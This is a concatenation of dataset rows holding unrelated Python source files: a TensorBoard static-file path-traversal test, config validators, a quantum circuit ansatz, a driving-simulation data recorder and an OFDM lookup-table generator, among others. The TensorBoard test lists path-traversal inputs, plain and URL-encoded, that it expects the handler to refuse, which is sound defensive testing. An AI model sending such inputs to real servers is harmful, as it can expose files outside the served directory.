| 0.680162
|
500e5dfffbd885300eded76d1e5248f2991d335d
| 3,353
|
py
|
Python
|
tensorboard/examples/plugins/example_raw_scalars/test.py
|
BearerPipelineTest/tensorboard
|
0fa03a9a8309dc137a15645c931e8b625bc3869c
|
[
"Apache-2.0"
] | null | null | null |
tensorboard/examples/plugins/example_raw_scalars/test.py
|
BearerPipelineTest/tensorboard
|
0fa03a9a8309dc137a15645c931e8b625bc3869c
|
[
"Apache-2.0"
] | null | null | null |
tensorboard/examples/plugins/example_raw_scalars/test.py
|
BearerPipelineTest/tensorboard
|
0fa03a9a8309dc137a15645c931e8b625bc3869c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the example plugin."""
import ntpath
import posixpath
import unittest
from unittest import mock
from werkzeug import test
from werkzeug import wrappers
from tensorboard.plugins import base_plugin
from tensorboard_plugin_example_raw_scalars import plugin
def is_path_safe(path):
"""Returns the result depending on the plugin's static file handler."""
example_plugin = plugin.ExampleRawScalarsPlugin(base_plugin.TBContext())
serve_static_file = example_plugin._serve_static_file
client = test.Client(serve_static_file, wrappers.Response)
response = client.get(plugin._PLUGIN_DIRECTORY_PATH_PART + path)
return response.status_code == 200
class UrlSafetyTest(unittest.TestCase):
def test_path_traversal(self):
"""Properly check whether a URL can be served from the static folder."""
with mock.patch("builtins.open", mock.mock_open(read_data="data")):
self.assertTrue(is_path_safe("static/index.js"))
self.assertTrue(is_path_safe("./static/index.js"))
self.assertTrue(is_path_safe("static/../static/index.js"))
self.assertFalse(is_path_safe("../static/index.js"))
self.assertFalse(is_path_safe("../index.js"))
self.assertFalse(is_path_safe("static2/index.js"))
self.assertFalse(is_path_safe("notstatic/index.js"))
self.assertFalse(is_path_safe("static/../../index.js"))
self.assertFalse(is_path_safe("..%2findex.js"))
self.assertFalse(is_path_safe("%2e%2e/index.js"))
self.assertFalse(is_path_safe("%2e%2e%2findex.js"))
self.assertFalse(
is_path_safe(
"static/../..\\org_tensorflow_tensorboard\\static\\index.js"
)
)
self.assertFalse(
is_path_safe(
"static/../../org_tensorflow_tensorboard/static/index.js"
)
)
self.assertFalse(
is_path_safe(
"static/%2e%2e%2f%2e%2e%5corg_tensorflow_tensorboard%5cstatic%5cindex.js"
)
)
self.assertFalse(
is_path_safe(
"static/%2e%2e%2f%2e%2e%2forg_tensorflow_tensorboard%2fstatic%2findex.js"
)
)
# Test with OS specific path modules.
with mock.patch("os.path", posixpath):
self.assertTrue(is_path_safe("static/\\index.js"))
with mock.patch("os.path", ntpath):
self.assertFalse(is_path_safe("static/\\index.js"))
if __name__ == "__main__":
unittest.main()
| 38.988372
| 93
| 0.632568
|
594e1c1b819a42f9c8c8f0daab1b52842ca64dc0
| 11,888
|
py
|
Python
|
src/yamlfig/test.py
|
ktkalaru/yamlfig
|
a6ddb2c8346ae5695402c25921fdc0d2aaa9b3a1
|
[
"MIT"
] | 1
|
2021-03-26T08:31:18.000Z
|
2021-03-26T08:31:18.000Z
|
src/yamlfig/test.py
|
ktkalaru/yamlfig
|
a6ddb2c8346ae5695402c25921fdc0d2aaa9b3a1
|
[
"MIT"
] | null | null | null |
src/yamlfig/test.py
|
ktkalaru/yamlfig
|
a6ddb2c8346ae5695402c25921fdc0d2aaa9b3a1
|
[
"MIT"
] | null | null | null |
"""Module contains functions that test for common config patterns.
Standard test functions and higher-order functions for use with
yamlfig's rule testing functionality. Function names that begin with
is_* are meant to be passed as the test parameter when instantiating
or adding a YamlConfigRule. Many of the tests include a variant with
match_* which simply takes the value to be tested. Both variants
return None if the test succeeds and a string explaining the error if
not. The match variants are standalone and can incorporate
functionally equivalent testing into other code.
"""
# Standard modules
import os
import re
def is_interval(lower, upper, exclude_lower=False, include_upper=False):
"""Test that value is within the specified interval.
The lower is the bottom of the interval, and upper is the top. By
default, the interval includes the lower bound and excludes the
upper bound, for consistency with python ranges and lots of other
things. In mathematical notation, the default is: [lower, upper)
The exclude_lower flag will exclude the lower bound, and the
include_upper flag will include the upper bound.
Note that since the implementation relies only on inequality
comparisons which are implemented for all objects, by providing
lower and upper of type str, the intervals can be defined as more
lexicographical or otherwise, based on the object type.
"""
# pylint: disable=unused-argument # args defined by test definition
lowersym = '(' if exclude_lower else '['
uppersym = ']' if include_upper else ')'
intervalstr = '{0}{1}, {2}{3}'.format(
lowersym, repr(lower), repr(upper), uppersym)
if (lower > upper or (lower == upper and (
exclude_lower or not include_upper))):
raise ValueError('invalid interval "{0}"'.format(intervalstr))
def is_interval_test(conf, path, value):
if value < lower or (value <= lower and exclude_lower):
return u'{0} is below the interval {1}'.format(
repr(value), intervalstr)
if value > upper or (value >= upper and not include_upper):
return u'{0} is above the interval {1}'.format(
repr(value), intervalstr)
return None
return is_interval_test
def is_regex(regex, invert=False):
"""Test that value matches the given regex.
The regular expression is searched against the value, so a match
in the middle of the value will succeed. To specifically match
the beginning or the whole regex, use anchor characters. If
invert is true, then matching the regex will cause the test to
fail.
"""
# pylint: disable=unused-argument # args defined by test definition
rex = re.compile(regex)
def is_regex_test(conf, path, value):
match = rex.search(value)
if invert and match:
return u'"{0}" matches /{1}/'.format(value, regex)
if not invert and not match:
return u'"{0}" does not match /{1}/'.format(value, regex)
return None
return is_regex_test
def match_is_ipv4_address(value):
"""Match given value as a valid dotted-quad IPv4 address."""
# Apply the dotted-quad pattern to the string and detect a mismatch
try:
match = re.search(r'^(\d+)\.(\d+)\.(\d+)\.(\d+)$', value)
except TypeError:
return u'{0} must be a string in IPv4 dotted-quad notation'.format(
repr(value))
if not match:
return u'"{0}" must be in IPv4 dotted-quad notation'.format(
value)
# Validate the range of each octet
octets = [int(x) for x in match.groups()]
for idx, octet in enumerate(octets):
if octet > 255:
return '{0} octet of "{1}" exceeds 255'.format(
['1st', '2nd', '3rd', '4th'][idx], value)
return None
def is_ipv4_address(conf, path, value):
"""Test that value is a valid dotted-quad IPv4 address."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_ipv4_address(value)
def match_is_domain_name(value):
"""Match given value against the format of a DNS domain name.
Primary reference(s):
https://en.wikipedia.org/wiki/Domain_Name_System
"""
# pylint: disable=too-many-return-statements
if value is None or len(value) == 0:
return u'domain {0} cannot be empty'.format(repr(value))
labels = value.split('.')
if len(labels) > 127:
return u'domain "{0}" cannot have more than 127 labels'.format(
value)
for label in labels:
if len(label) == 0:
return u'domain "{0}" cannot have an empty label'.format(value)
if len(label) >= 63:
return u'domain "{0}" cannot have a 63+ byte label'.format(value)
match = re.search('([^A-Za-z0-9-])', label)
if match:
return u'domain "{0}" cannot contain "{1}"'.format(
value, match.group(1))
if label.startswith('-') or label.endswith('-'):
return u'domain "{0}" label cannot start or end with "-"'.format(
value)
if re.search('^[0-9]+$', labels[-1]):
return u'domain "{0}" top-level domain cannot be only digits'.format(
value)
return None
def is_domain_name(conf, path, value):
"""Test that the value matches the format of a DNS domain name."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_domain_name(value)
def match_is_email_address(value):
"""Match the value matches the format of an email address.
Primary reference(s):
https://en.wikipedia.org/wiki/Email_address
Note that the characters and character sequences allowed in the
case of a quoted user part is likely still both over and under
restrictive. Authoritatively parsing an email address is likely
beyond the scope of these pre-packaged testers.
"""
# pylint: disable=too-many-return-statements, too-many-branches
if value is None or len(value) == 0:
return u'email address {0} cannot be empty'.format(repr(value))
partmatch = re.search('^(?P<userpart>.*)@(?P<domainpart>.*)$', value)
if not partmatch:
return u'"{0}" is not of the form username@domain'.format(value)
userpart, domainpart = partmatch.groups()
if len(userpart) == 0:
return u'{0} has empty userpart'.format(repr(value))
if len(userpart) >= 64:
return u'{0} has 64+ byte userpart'.format(repr(value))
if not userpart.startswith('"') or not userpart.endswith('"'):
match = re.search(r'([^A-Za-z0-9!#$%&\'*+/=?^_`{|}~.-])', userpart)
if match:
return u'{0} unquoted userpart cannot contain {1}'.format(
repr(value), repr(match.group(1)))
if userpart.startswith('.') or userpart.endswith('.'):
return u'{0} unquoted userpart cannot start or end with "."'.format(
repr(value))
if '..' in userpart:
return u'{0} unquoted userpart cannot contain ".."'.format(
repr(value))
else:
qcpart = userpart[1:-1]
match = re.search(
r'([^A-Za-z0-9!#$%&\'*+/=?^_`{|}~.(),:;<>@\[\]\ -])', qcpart)
if match:
return (
u'{0} userpart quoted content cannot contain "{1}"'.format(
repr(value), match.group(1)))
if len(domainpart) == 0:
return u'"{0} has empty domainpart'.format(value)
if len(domainpart) >= 63:
return u'"{0} has 63+ byte domainpart'.format(value)
test_domain_error = match_is_domain_name(domainpart)
if test_domain_error is not None:
return test_domain_error
return None
def is_email_address(conf, path, value):
"""Test that value matches the format of an email address."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_email_address(value)
def match_is_url(value):
"""Match the value against the format of a URL.
These patterns were derived from discussions on various websites;
most notably the following site deserves a lot of credit:
https://mathiasbynens.be/demo/url-regex
A pattern from that site has been tweaked through subsequent
experience and testing, but this test is best-effort and provides
nothing in the way of diagnostics.
"""
rexlist = [
r'^((?:[A-Za-z]{3,9}:(?:\/\/)?)' +
r'(?:[\-;:&=\+\$,\w]+@)?[A-Za-z0-9\.\-]+' +
r'(?::[0-9]+)?(?:(?:\/[\+~%\/\.\w\-_]*)?\??(?:[\-\+\/=&;%@\.\w_]*)#?' +
r'(?:[\.\!\/\\\w&=-]*))?)$',
r'^((?:www\.|[\-;:&=\+\$,\w]+@)[A-Za-z0-9\.\-]+' +
r'(?:(?:\/[\+~%\/\.\w\-_]*)?\??(?:[\-\+\/=&;%@\.\w_]*)' +
r'#?(?:[\.\!\/\\\w]*))?)$']
if value is None or len(value) == 0:
return u'url {0} cannot be empty'.format(repr(value))
for rex in rexlist:
if re.search(rex, value):
return None
return u'"{0}" was not recognized as a valid url'.format(value)
def is_url(conf, path, value):
"""Test that value matches the format of a URL."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_url(value)
def is_file_path(*ostests):
"""Create test of value against the given set of file-metadata properties.
One or more of the following ostest values can be given:
[!]exists: test that the path exists (!: not exist)
[!]isdir: test that the path is a directory (!: not a directory)
[!]isfile: test that the path is a file (!: not a file)
[!]islink: test that the path is a symbolic link (!: not a link)
[!]ismount: test that the path is a mount point (!: not a mount point)
They will be tested in the order given, so they can be strung
together to ensure a most helpful error message (e.g., exists,
isdir) to first test whether the path exists, so a non-existent
path will generate a "does not exist" error rather than the less
helpful "is not a directory" error.
"""
# pylint: disable=unused-argument # args defined by test definition
for ostest in ostests:
assert ostest in [
'exists', '!exists',
'isdir', '!isdir',
'isfile', '!isfile',
'islink', '!islink',
'ismount', '!ismount']
def is_file_path_test(conf, path, value):
res = []
for ostest in ostests:
if ostest == 'exists' and not os.path.exists(value):
res.append(u'"{0}" does not exist'.format(value))
elif ostest == '!exists' and os.path.exists(value):
res.append(u'"{0}" exists'.format(value))
elif ostest == 'isdir' and not os.path.isdir(value):
res.append(u'"{0}" is not a directory'.format(value))
elif ostest == '!isdir' and os.path.isdir(value):
res.append(u'"{0}" is a directory'.format(value))
elif ostest == 'isfile' and not os.path.isfile(value):
res.append(u'"{0}" is not a file'.format(value))
elif ostest == '!isfile' and os.path.isfile(value):
res.append(u'"{0}" is a file'.format(value))
elif ostest == 'islink' and not os.path.islink(value):
res.append(u'"{0}" is not a symlink'.format(value))
elif ostest == '!islink' and os.path.islink(value):
res.append(u'"{0}" is a symlink'.format(value))
elif ostest == 'ismount' and not os.path.ismount(value):
res.append(u'"{0}" is not a mount point'.format(value))
elif ostest == '!ismount' and os.path.ismount(value):
res.append(u'"{0}" is a mount point'.format(value))
if len(res) > 0:
return u' and '.join(res)
return None
return is_file_path_test
| 40.573379
| 80
| 0.614401
|
ebdbb4d99f1234c67a9d6887cc0c3694d0cced77
| 1,633
|
py
|
Python
|
qnn/ansatz/alternating_layer_tdcnot_ansatz.py
|
bjader/quantum-neural-network
|
3f23e14fac8700d3f48593f0727c6da59af5f77f
|
[
"MIT"
] | 9
|
2021-06-08T14:02:38.000Z
|
2022-03-08T10:14:22.000Z
|
qnn/ansatz/alternating_layer_tdcnot_ansatz.py
|
bjader/quantum-neural-network
|
3f23e14fac8700d3f48593f0727c6da59af5f77f
|
[
"MIT"
] | null | null | null |
qnn/ansatz/alternating_layer_tdcnot_ansatz.py
|
bjader/quantum-neural-network
|
3f23e14fac8700d3f48593f0727c6da59af5f77f
|
[
"MIT"
] | 1
|
2021-06-12T16:28:53.000Z
|
2021-06-12T16:28:53.000Z
|
from qiskit.circuit import Parameter
from ansatz.variational_ansatz import VariationalAnsatz
class AlternatingLayerTDCnotAnsatz(VariationalAnsatz):
"""
A variational circuit ansatz. Prepares quantum circuit object for variational circuit consisting of thinly
dressed C-NOT gates applied to pairs of qubits in an alternating layer pattern. A single sweep consists of two
applications of thinly-dressed gates between nearest neighbour qubits, with alternating pairs between the two
applications. The thinly dressed C-NOT gate is define in arXiv:2002.04612, we use single qubit Y rotations
preceding and single qubit X rotations following the C-NOT gate.
"""
def __init__(self, layers, sweeps_per_layer, activation_function):
super().__init__(layers, sweeps_per_layer, activation_function)
def add_entangling_gates(self, n_data_qubits):
for i in range(n_data_qubits - 1)[::2]:
ctrl, tgt = i, ((i + 1) % self.qc.num_qubits)
self.build_tdcnot(ctrl, tgt)
for i in range(n_data_qubits)[1::2]:
ctrl, tgt = i, ((i + 1) % self.qc.num_qubits)
self.build_tdcnot(ctrl, tgt)
return self.qc
def build_tdcnot(self, ctrl, tgt):
params = [Parameter("ansatz{}".format(str(self.param_counter + j))) for j in range(4)]
self.qc.ry(params[0], self.qr[ctrl])
self.qc.ry(params[1], self.qr[tgt])
self.qc.cx(ctrl, tgt)
self.qc.rz(params[2], self.qr[ctrl])
self.qc.rz(params[3], self.qr[tgt])
self.param_counter += 4
def add_rotations(self, n_data_qubits):
pass
| 39.829268
| 114
| 0.68218
|
7e39818e45c2ed5d3f3e6dcbd5991319b5509f61
| 4,282
|
py
|
Python
|
DeepJanus-BNG/udacity_integration/train-dataset-recorder-brewer.py
|
zohdit/DeepJanus
|
c32022bdff2994e91df7af8af64a022d3e7e6a75
|
[
"MIT"
] | 7
|
2020-10-12T10:46:30.000Z
|
2021-06-23T10:42:30.000Z
|
DeepJanus-BNG/udacity_integration/train-dataset-recorder-brewer.py
|
zohdit/DeepJanus
|
c32022bdff2994e91df7af8af64a022d3e7e6a75
|
[
"MIT"
] | null | null | null |
DeepJanus-BNG/udacity_integration/train-dataset-recorder-brewer.py
|
zohdit/DeepJanus
|
c32022bdff2994e91df7af8af64a022d3e7e6a75
|
[
"MIT"
] | 2
|
2021-04-26T12:46:44.000Z
|
2021-09-16T08:27:53.000Z
|
import random
from time import sleep
from typing import Tuple, List
import numpy as np
from self_driving.beamng_brewer import BeamNGBrewer
from udacity_integration.beamng_car_cameras import BeamNGCarCameras
from self_driving.road_generator import RoadGenerator
from self_driving.beamng_tig_maps import maps
from self_driving.beamng_waypoint import BeamNGWaypoint
from self_driving.decal_road import DecalRoad
from udacity_integration.training_data_collector_and_writer import TrainingDataCollectorAndWriter
from self_driving.utils import get_node_coords
maps.install_map_if_needed()
STEPS = 5
# x is -y and *angle direction is reversed*
def get_rotation(road: DecalRoad):
v1 = road.nodes[0][:2]
v2 = road.nodes[1][:2]
v = np.subtract(v1, v2)
deg = np.degrees(np.arctan2([v[0]], [v[1]]))
return (0, 0, deg)
def get_script_point(p1, p2) -> Tuple[Tuple, Tuple]:
a = np.subtract(p2[0:2], p1[0:2])
# calculate the vector which length is half the road width
v = (a / np.linalg.norm(a)) * p1[3] / 4
# add normal vectors
r = p1[0:2] + np.array([v[1], -v[0]])
return tuple(r)
# Calculate the points to guide the AI from the road points
def calculate_script(road_points):
script_points = [get_script_point(road_points[i], road_points[i + 1]) for i in range(len(road_points) - 1)]
assert(len(script_points) == len(road_points)-1)
# Get the last script point
script_points += [get_script_point(road_points[-1], road_points[-2])]
assert (len(script_points) == len(road_points))
orig = script_points[0]
script = [{'x': orig[0], 'y': orig[1], 'z': .5, 't': 0}]
i = 1
time = 0.18
# goal = len(street_1.nodes) - 1
# goal = len(brewer.road_points.right) - 1
goal = len(script_points) - 1
while i < goal:
node = {
# 'x': street_1.nodes[i][0],
# 'y': street_1.nodes[i][1],
# 'x': brewer.road_points.right[i][0],
# 'y': brewer.road_points.right[i][1],
'x': script_points[i][0],
'y': script_points[i][1],
'z': .5,
't': time,
}
script.append(node)
i += 1
time += 0.18
return script
def distance(p1, p2):
return np.linalg.norm(np.subtract(get_node_coords(p1), get_node_coords(p2)))
def run_sim(street_1: DecalRoad):
brewer = BeamNGBrewer(street_1.nodes)
waypoint_goal = BeamNGWaypoint('waypoint_goal', get_node_coords(street_1.nodes[-1]))
vehicle = brewer.setup_vehicle()
camera = brewer.setup_scenario_camera()
beamng = brewer.beamng
brewer.setup_road_nodes(street_1.nodes)
maps.beamng_map.generated().write_items(brewer.decal_road.to_json() + '\n' + waypoint_goal.to_json())
cameras = BeamNGCarCameras()
brewer.vehicle_start_pose = brewer.road_points.vehicle_start_pose()
#brewer.vehicle_start_pose = BeamNGPose()
sim_data_collector = TrainingDataCollectorAndWriter(vehicle, beamng, street_1, cameras)
brewer.bring_up()
print('bring up ok')
script = calculate_script(brewer.road_points.middle)
# Trick: we start from the road center
vehicle.ai_set_script(script[4:])
#vehicle.ai_drive_in_lane(True)
beamng.pause()
beamng.step(1)
def start():
for idx in range(1000):
if (idx * 0.05 * STEPS) > 3.:
sim_data_collector.collect_and_write_current_data()
dist = distance(sim_data_collector.last_state.pos, waypoint_goal.position)
if dist < 15.0:
beamng.resume()
break
# one step is 0.05 seconds (5/100)
beamng.step(STEPS)
try:
start()
finally:
beamng.close()
if __name__ == '__main__':
NODES = 20
MAX_ANGLE = 80
# MAX_ANGLE = 130
# MAX_ANGLE = 60
NUM_SPLINE_NODES = 20
SEG_LENGTH = 25
road = RoadGenerator(num_control_nodes=NODES, max_angle=MAX_ANGLE, seg_length=SEG_LENGTH,
num_spline_nodes=NUM_SPLINE_NODES).generate(visualise=False)
from self_driving.beamng_road_visualizer import plot_road
plot_road(road, save=True)
street = DecalRoad('street_1', drivability=1, material='').add_4d_points(road.sample_nodes)
run_sim(street)
| 29.736111
| 111
| 0.656936
|
bb1f1b63a5f1c397cdce0d33921ac4730ce35af9
| 1,150
|
py
|
Python
|
ecl/tests/functional/network/v2/test_firewall_action.py
|
keiichi-hikita/eclsdk
|
c43afb982fd54eb1875cdc22d46044644d804c4a
|
[
"Apache-2.0"
] | null | null | null |
ecl/tests/functional/network/v2/test_firewall_action.py
|
keiichi-hikita/eclsdk
|
c43afb982fd54eb1875cdc22d46044644d804c4a
|
[
"Apache-2.0"
] | null | null | null |
ecl/tests/functional/network/v2/test_firewall_action.py
|
keiichi-hikita/eclsdk
|
c43afb982fd54eb1875cdc22d46044644d804c4a
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from ecl.tests.functional import base
class TestFirewallAction(base.BaseFunctionalTest):
def test_01_reboot_firewall(self):
reboot = self.conn.network.reboot_firewall(
"5f29f0f4-ef23-484e-a81f-ea621175f1a3",
"HARD"
)
def test_02_reset_password(self):
resp = self.conn.network.reset_password_firewall(
"5f29f0f4-ef23-484e-a81f-ea621175f1a3",
"user-read"
)
print resp
self.assertIsInstance(resp.new_password, six.string_types)
self.assertIsInstance(resp.username, six.string_types)
| 38.333333
| 75
| 0.714783
|
fde799c38c6dd4393baa13f11529d67e52c8ccd7
| 1,099
|
py
|
Python
|
scripts/model/__init__.py
|
heptaliane/DCGanImageGenerator
|
691f28a6fa8d141a9da7dce42a8bf507b39c75ed
|
[
"MIT"
] | null | null | null |
scripts/model/__init__.py
|
heptaliane/DCGanImageGenerator
|
691f28a6fa8d141a9da7dce42a8bf507b39c75ed
|
[
"MIT"
] | null | null | null |
scripts/model/__init__.py
|
heptaliane/DCGanImageGenerator
|
691f28a6fa8d141a9da7dce42a8bf507b39c75ed
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import torch
from .dcgan_generator import DCGanGenerator
from .dcgan_discriminator import DCGanDiscriminator
# Logging
from logging import getLogger, NullHandler
logger = getLogger(__name__)
logger.addHandler(NullHandler())
def _reshape_state_dict(src, target):
assert src.dim() == target.dim()
for d in range(src.dim()):
chunk = list(torch.chunk(src, src.shape[d], dim=d))
while len(chunk) < target.shape[d]:
chunk.extend(chunk)
src = torch.cat(chunk[:target.shape[d]], dim=d)
return src
def load_pretrained_model(model, pretrained_path):
if not os.path.exists(pretrained_path):
return
logger.info('Load pretrained model (%s)', pretrained_path)
src = torch.load(pretrained_path)
dst = model.state_dict()
state = dict()
for k in dst.keys():
if k not in src:
state[k] = dst[k]
elif src[k].shape == dst[k].shape:
state[k] = src[k]
else:
state[k] = _reshape_state_dict(src[k], dst[k])
model.load_state_dict(state)
| 25.55814
| 62
| 0.640582
|
332f48ee48a686597c94d29190b8b58b8a1048e4
| 4,899
|
py
|
Python
|
scripts/gen_deinter_lut.py
|
andreaskuster/openofdm
|
0c39b31b808dd257cfc0696c8c4dd51dfd745edb
|
[
"Apache-2.0"
] | 1
|
2022-01-14T15:31:11.000Z
|
2022-01-14T15:31:11.000Z
|
scripts/gen_deinter_lut.py
|
bby0616/ofdm
|
8d9bfb692e9c1f45f9e3cf98eaef479616442716
|
[
"Apache-2.0"
] | null | null | null |
scripts/gen_deinter_lut.py
|
bby0616/ofdm
|
8d9bfb692e9c1f45f9e3cf98eaef479616442716
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Generate 802.11a/g/n Deinterleave LUT.
Output compensate for pucntureing.
"""
import argparse
import math
import os
import decode
"""
LUT ENTRY FORMAT
1 bit -- null_a
1 bit -- null_b
6 bit -- addra
6 bit -- addrb
3 bit -- bita
3 bit -- bitb
1 bit -- out_stb
1 bit -- done
-------------------
22 bits total
LUT FORMAT
+----------------+
| BASE ADDR |
| 32 ENTRY |
+----------------+
| 6 MBPS |
+----------------+
| 9 MBPS |
+----------------+
....
+----------------+
| MCS 0 |
+----------------+
...
+----------------+
| MCS 7 |
+----------------+
| PADDING |
+----------------+
"""
RATE_BITS = {
6: '1011',
9: '1111',
12: '1010',
18: '1110',
24: '1001',
36: '1101',
48: '1000',
54: '1100',
}
RATES = [
# (rate, mcs, ht)
(6, 0, False),
(9, 0, False),
(12, 0, False),
(18, 0, False),
(24, 0, False),
(36, 0, False),
(48, 0, False),
(54, 0, False),
(0, 0, True),
(0, 1, True),
(0, 2, True),
(0, 3, True),
(0, 4, True),
(0, 5, True),
(0, 6, True),
(0, 7, True),
]
def do_rate(rate=6, mcs=0, ht=False):
idx_map = decode.Decoder(None).deinterleave(None, rate=rate, mcs=mcs, ht=ht)
seq = [t[1] for t in idx_map]
erase = '1/2'
if ht:
n_bpsc = decode.HT_MCS_PARAMETERS[mcs][0]
if mcs in [2, 4, 6]:
erase = '3/4'
pass
elif mcs == 5:
erase = '2/3'
pass
elif mcs == 7:
erase = '5/6'
else:
n_bpsc = decode.RATE_PARAMETERS[rate][0]
if rate in [9, 18, 36]:
erase = '3/4'
elif rate == 48:
erase = '2/3'
data = []
i = 0
puncture = 0
while i < len(seq):
addra = seq[i] // n_bpsc
bita = seq[i] % n_bpsc
if i + 1 < len(seq):
addrb = seq[i + 1] // n_bpsc
bitb = seq[i + 1] % n_bpsc
else:
addrb = 0
bitb = 0
base = (addra << 14) + (addrb << 8) + (bita << 5) + (bitb << 2) + (1 << 1)
if erase == '1/2':
mask = base
data.append(mask)
elif erase == '3/4':
if puncture == 0:
mask = base
data.append(mask)
puncture = 1
else:
mask = (1 << 20) + base
data.append(mask)
mask = (1 << 21) + base
data.append(mask)
puncture = 0
elif erase == '2/3':
if puncture == 0:
mask = base
data.append(mask)
puncture = 1
else:
mask = (1 << 20) + base
data.append(mask)
i -= 1
puncture = 0
elif erase == '5/6':
if puncture == 0:
mask = base
data.append(mask)
puncture = 1
elif puncture == 1:
mask = (1 << 20) + base
data.append(mask)
mask = (1 << 21) + base
data.append(mask)
puncture = 2
else:
mask = (1 << 20) + base
data.append(mask)
mask = (1 << 21) + base
data.append(mask)
puncture = 0
i += 2
# reset addra to NUM_SUBCARRIER/2
if ht:
mask = (26 << 14) + 1
else:
mask = (24 << 14) + 1
data.append(mask)
# sentinel
data.extend([0] * 4)
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--out')
args = parser.parse_args()
if args.out is None:
args.out = os.path.join(os.getcwd(), 'deinter_lut.mif')
coe_out = '%s.coe' % (os.path.splitext(args.out)[0])
header = [0] * 32
lut = []
offset = 32
for rate, mcs, ht in RATES:
if ht:
idx = (1 << 4) + mcs
else:
idx = int(RATE_BITS[rate], 2)
header[idx] = offset
print('[rate=%d, mcs=%d] -> %d' % (rate, mcs, offset))
data = do_rate(rate=rate, mcs=mcs, ht=ht)
offset += len(data)
lut.extend(data)
total = int(2 ** math.ceil(math.log(offset, 2)))
print('Total row: %d (round up to %d)' % (offset, total))
lut.extend([0] * (total - offset))
with open(args.out, 'w') as f:
for l in header + lut:
f.write('{0:022b}\n'.format(l))
print("MIL file saved as %s" % (args.out))
with open(coe_out, 'w') as f:
f.write('memory_initialization_radix=2;\n')
f.write('memory_initialization_vector=\n')
f.write(',\n'.join(['{0:022b}'.format(l) for l in header + lut]))
f.write(';')
print("COE file saved as %s" % (coe_out))
if __name__ == '__main__':
main()
| 21.581498
| 82
| 0.423352
|
4df63b98a03ecc20ec1bb3b9f03fc78127edd480
| 2,901
|
py
|
Python
|
StockPortfolio/runportfolio.py
|
jedpittman/python_samples
|
e3d0271e10cf981f7a0ff39f1e28edf26c12bcef
|
[
"MIT"
] | null | null | null |
StockPortfolio/runportfolio.py
|
jedpittman/python_samples
|
e3d0271e10cf981f7a0ff39f1e28edf26c12bcef
|
[
"MIT"
] | null | null | null |
StockPortfolio/runportfolio.py
|
jedpittman/python_samples
|
e3d0271e10cf981f7a0ff39f1e28edf26c12bcef
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import requests
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
#load the data
# from google.colab import files
# files.upload()
# Store the data
df = pd.read_csv("data\FakeStockData.csv")
# df = pd.read_csv('NUSE_Close.csv')
#df # show the data frame.
# Should be this form:
# Date | Symbol1 | symbol2 ... etc.
# for each symbol, should be a close price.
# Set the date as the index
df.set_index(pd.DatetimeIndex(df['Date'].values))
# Remove the date column from the df
# columns = axis 1
df.drop(columns=['Date'], axis=1, inplace=True)
#print(df)
#df
#exit(1)
# Calculate the expected annualized returns and the annualized
# sample covariance matrix of the daily asset returns.
mu = expected_returns.mean_historical_return(df)
S = risk_models.sample_cov(df)
# SR describes the excess return you get for volitility you endure holding
# a riskier asset.
ef = EfficientFrontier(mu, S) # create the EF object
weights = ef.max_sharpe() # Get the raw weights
# this will set weights below cutoff to zero, rounding the rest.
cleaned_weights = ef.clean_weights()
print(cleaned_weights)
#show the expected return, SR, and
# in a jupyter notebook, this shows an ordered dicts.
# should sum to 1 for all weights.
ef.portfolio_performance(verbose=True)
#Figure out the allocations for each stock.
# pip install pulp
#Get the discrete allocation of each share per stock
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
portfolio_val = 5000 # how much to invest
latest_prices = get_latest_prices(df)
weights = cleaned_weights
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_val)
allocation, leftover = da.lp_portfolio()
# Returns a dictionary with pairs ticker: #shares
# Returns 1 leftover.
print('Discrete allocation:', allocation)
print("leftovers: ",leftover)
exit(1)
"""
# Get company name for stock ticker
def get_company_name(symbol):
url = 'http://d.yimg.com/autoc.finance.yahoo.com/autoc?query=' + symbol + '®ion=1lang=en'
result = requests.get(url).json()
for r in result['ResultSet']['Result']:
if r['symbol'] == symbol:
return r['name']
# Store the company name into a list.
company_name = []
for symbol in allocation:
company_name.append( get_company_name(symbol))
# Get the discrete allocation values
discrete_allocation_list = []
for symbol in allocation:
discrete_allocation_list.append(allocation.get(symbol)
# Create a dataframe for the portfolio
portfolio_df = pd.DataFrame(columns=['Company_name', 'Company_ticker', 'Discrete_val_' + str(portfolio_val)])
portfolio_df['Company_name'] = company_name
portfolio_df['Company_ticker'] = allocation
portfolio_df['Discrete_val' + str(portfolio_val)] = discrete_allocation_list
# Show it.
portfolio_df
"""
| 29.30303
| 109
| 0.759393
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.